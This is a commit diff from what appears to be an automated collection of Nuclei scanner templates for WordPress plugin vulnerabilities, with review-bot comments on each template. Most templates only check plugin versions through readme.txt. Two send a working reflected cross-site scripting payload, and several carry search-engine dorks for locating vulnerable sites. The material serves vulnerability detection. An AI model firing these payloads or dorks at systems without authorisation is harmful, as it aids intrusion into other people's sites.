20241206
actions-user committed Dec 6, 2024
1 parent 4dc726a commit 55abde8
Showing 254 changed files with 14,865 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
@@ -1 +1 @@
20241205
20241206
252 changes: 252 additions & 0 deletions poc.txt

59 changes: 59 additions & 0 deletions poc/api/capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db.yaml
@@ -0,0 +1,59 @@
id: capitalize-my-title-ebc5f77da2159725c00bfadc6477c6db

info:
name: >
Capitalize My Title <= 0.5.3 - Authenticated (Contributor+) Stored Cross-Site Scripting
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/44e53c69-e301-4007-b090-c277e9f07905?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/capitalize-my-title/"
google-query: inurl:"/wp-content/plugins/capitalize-my-title/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,capitalize-my-title,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/capitalize-my-title/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "capitalize-my-title"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 0.5.3')
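Review bot: `description: >` under `info:` is an empty folded scalar, and `cvss-metrics:`, `cvss-score:` and `cve-id:` under `classification:` are empty too, so the template carries a `cve` tag and a `low` severity with no identifier or metric behind them; either fill these from the Wordfence reference or drop the empty keys and the `cve` tag. The matchers only fingerprint the plugin from `readme.txt` (`Stable tag`, status 200, slug in body) and never touch the stored-XSS sink, so a site that patched without bumping the readme, or that left a deactivated copy on disk, will be reported as vulnerable; the name should say it is a version-based detection. The two `version` extractors differ only by `internal: true`; one extractor is enough for the `compare_versions` DSL check, unless the second is deliberately kept so the version shows in output, in which case a comment saying so would help. `shodan-query: 'vuln:'` is a placeholder with nothing after the colon.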
59 changes: 59 additions & 0 deletions poc/auth/cookielay-d1709b11e04e7ac0020e84fff5516e5a.yaml
@@ -0,0 +1,59 @@
id: cookielay-d1709b11e04e7ac0020e84fff5516e5a

info:
name: >
Cookielay <= 1.2.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via cookielay Shortcode
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/8e014aa5-4fdf-458b-a975-e3ced7186dc2?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/cookielay/"
google-query: inurl:"/wp-content/plugins/cookielay/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,cookielay,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/cookielay/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "cookielay"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.2.0')
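Review bot: `redirects: true` with `max-redirects: 3` on a `readme.txt` probe means a host that redirects missing files to a catch-all page returning 200 will still pass the status matcher; the `Stable tag` regex then yields no `version`, and whether `compare_versions(version, '<= 1.2.0')` fails closed in that case is not documented here, so a short comment (or dropping redirects for a static-file check) would make the intent clear. The `words` matcher on `"cookielay"` matches the plugin slug anywhere in the body, which the catch-all page may also contain, so it adds little beyond the regex. As with the other templates in this commit, `description: >` and the `classification:` fields are left empty while the `cve` tag is set.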
59 changes: 59 additions & 0 deletions poc/auth/mycred-b69b74183494c4b8dbaaa94b47c77a89.yaml
@@ -0,0 +1,59 @@
id: mycred-b69b74183494c4b8dbaaa94b47c77a89

info:
name: >
myCred – Loyalty Points and Rewards plugin <= 2.7.5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting via mycred_send Shortcode
author: topscoder
severity: low
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/2d1d9bee-4afa-44cc-8e7a-8a73ad018c4a?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/mycred/"
google-query: inurl:"/wp-content/plugins/mycred/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,mycred,low

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/mycred/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "mycred"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 2.7.5.2')
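Review bot: `tags:` repeats the severity as a literal (`low`) and the slug (`mycred`), both of which already appear in `severity:` and `id:`; if severity is ever re-rated from the Wordfence entry, the tag will silently drift, so generating the tag from the severity field or noting the duplication would avoid that. The `name:` folded scalar contains an en-dash in `myCred – Loyalty Points and Rewards plugin`, which is valid YAML but worth confirming the output pipeline handles as UTF-8. `description: >` is empty and `cve-id:` is unset despite the `cve` tag.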
59 changes: 59 additions & 0 deletions poc/auth/otp-login-59e25716cd4187f6ae0041590ffc4112.yaml
@@ -0,0 +1,59 @@
id: otp-login-59e25716cd4187f6ae0041590ffc4112

info:
name: >
Login With OTP <= 1.4.2 - Authentication Bypass via Weak OTP
author: topscoder
severity: critical
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/d3775d48-5985-475e-8fb9-c4c5fd044772?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/otp-login/"
google-query: inurl:"/wp-content/plugins/otp-login/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,otp-login,critical

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/otp-login/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "otp-login"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.4.2')
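Review bot: `severity: critical` for an "Authentication Bypass via Weak OTP" is being asserted from nothing more than a `readme.txt` version string, and `description: >` is empty, so a reader of the scan result has no statement of what was actually observed; at minimum the description should say the finding is version-based and point to the Wordfence entry in `reference:`, so that triage can separate "plugin at or below 1.4.2 installed" from "bypass confirmed". The `cvss-metrics:` and `cvss-score:` keys are empty, which is especially noticeable for a critical rating.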
@@ -0,0 +1,59 @@
id: third-party-cookie-eraser-a95c341c56a938945d517c311512eb15

info:
name: >
Third Party Cookie Eraser <= 1.0.2 - Cross-Site Request Forgery to Stored Cross-Site Scripting
author: topscoder
severity: medium
description: >
reference:
- https://github.com/topscoder/nuclei-wordfence-cve
- https://www.wordfence.com/threat-intel/vulnerabilities/id/ded8f958-ed2a-43ab-8688-9f6d16515469?source=api-scan
classification:
cvss-metrics:
cvss-score:
cve-id:
metadata:
fofa-query: "wp-content/plugins/third-party-cookie-eraser/"
google-query: inurl:"/wp-content/plugins/third-party-cookie-eraser/"
shodan-query: 'vuln:'
tags: cve,wordpress,wp-plugin,third-party-cookie-eraser,medium

http:
- method: GET
redirects: true
max-redirects: 3
path:
- "{{BaseURL}}/wp-content/plugins/third-party-cookie-eraser/readme.txt"

extractors:
- type: regex
name: version
part: body
group: 1
internal: true
regex:
- "(?mi)Stable tag: ([0-9.]+)"

- type: regex
name: version
part: body
group: 1
regex:
- "(?mi)Stable tag: ([0-9.]+)"

matchers-condition: and
matchers:
- type: status
status:
- 200

- type: word
words:
- "third-party-cookie-eraser"
part: body

- type: dsl
dsl:
- compare_versions(version, '<= 1.0.2')
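Review bot: the `name:` describes a CSRF-to-stored-XSS chain, but nothing in `http:` exercises a CSRF-protected action or a stored sink; the checks are the same readme fingerprint used by the other templates, so the name should carry a version-detection qualifier to avoid over-reporting. The `info:` block has the same empty `description: >`, `cvss-metrics:`, `cvss-score:` and `cve-id:` fields, and the `cve` tag is set without a CVE identifier; this hunk also arrives without a visible file-header line above `@@ -0,0 +1,59 @@`, so the target path under `poc/` should be confirmed.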
35 changes: 35 additions & 0 deletions poc/cve/CVE-2011-4926-2089.yaml
@@ -0,0 +1,35 @@
id: CVE-2011-4926
info:
name: Adminimize 1.7.22 - Reflected Cross-Site Scripting
author: daffainfo
severity: medium
description: A cross-site scripting vulnerability in adminimize/adminimize_page.php in the Adminimize plugin before 1.7.22 for WordPress allows remote attackers to inject arbitrary web script or HTML via the page parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2011-4926
- https://www.whitesourcesoftware.com/vulnerability-database/CVE-2011-4926
- http://plugins.trac.wordpress.org/changeset?reponame=&new=467338@adminimize&old=466900@adminimize#file5
- http://www.openwall.com/lists/oss-security/2012/01/10/9
classification:
cve-id: CVE-2011-4926
metadata:
google-query: inurl:"/wp-content/plugins/adminimize/"
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

# Enhanced by mp on 2022/02/21
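Review bot: `name:` says `Adminimize 1.7.22 - Reflected Cross-Site Scripting` while `description:` says the bug affects versions `before 1.7.22`, so the name points at the fixed release; it should read `< 1.7.22`. The template uses the legacy `requests:` key whereas every other template in this commit uses `http:`; mixing the two in one repository makes the collection depend on the engine still honouring the old key, so converting this one to `http:` would be consistent. The body matcher looks for the literal `</script><script>alert(document.domain)</script>` reflected from the `page` parameter together with a `text/html` content type, which is a reasonable reflection check; the trailing `# Enhanced by mp on 2022/02/21` comment indicates this was copied from an upstream template and should probably be noted in `reference:` or dropped.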
25 changes: 25 additions & 0 deletions poc/cve/CVE-2011-5181-2118.yaml
@@ -0,0 +1,25 @@
id: CVE-2011-5181
info:
name: ClickDesk Live Support Live Chat 2.0 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in clickdesk.php in ClickDesk Live Support - Live Chat plugin 2.0 for WordPress allows remote attackers to inject arbitrary web script or HTML via the cdwidgetid parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2011-5181
tags: cve,cve2011,wordpress,xss,wp-plugin
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200
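Review bot: this template has no `classification:` block and therefore no `cve-id:` even though the `id:` is `CVE-2011-5181` and the tags say `cve,cve2011`; adding `classification: cve-id: CVE-2011-5181` keeps it in line with the CVE-2011-4926 template in the same commit. `reference:` is a single scalar URL here but a list everywhere else in the commit; both parse, but one form should be used. As with the previous hunk, the legacy `requests:` key is used instead of `http:`, and the matchers confirm the reflected payload plus `text/html`, which is sound, though the `part: body` key sits after `words:` here and before it in the other template, a small consistency point.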